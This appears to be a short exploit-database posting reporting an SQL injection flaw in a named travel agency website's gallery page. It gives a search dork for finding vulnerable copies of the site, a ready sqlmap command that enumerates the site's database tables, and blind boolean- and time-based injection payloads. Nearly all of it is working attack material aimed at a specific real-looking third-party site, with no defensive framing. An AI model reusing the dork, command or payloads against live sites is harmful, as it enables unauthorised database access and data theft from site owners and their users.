# Exploit Title:skystartravels SQL Injection
# Date:17.05.2019
# Dork :intext:"All Rights Reserved to www.skystartravels.com" gallery.php?id=1
# Exploit Author:Cerkuday // CyberWarrior TİM AKINCILAR
# Tested on:Windows &Kali Linux
#Demo:
https://www.skystartravels.com/gallery.php?id=1
# Poc:
sqlmap.py -u "https://www.skystartravels.com/gallery.php?id=1" --random-agent -D skystart_data --tables
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6484=6484 AND 'VhsK'='VhsK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'SZqU'='SZqU
---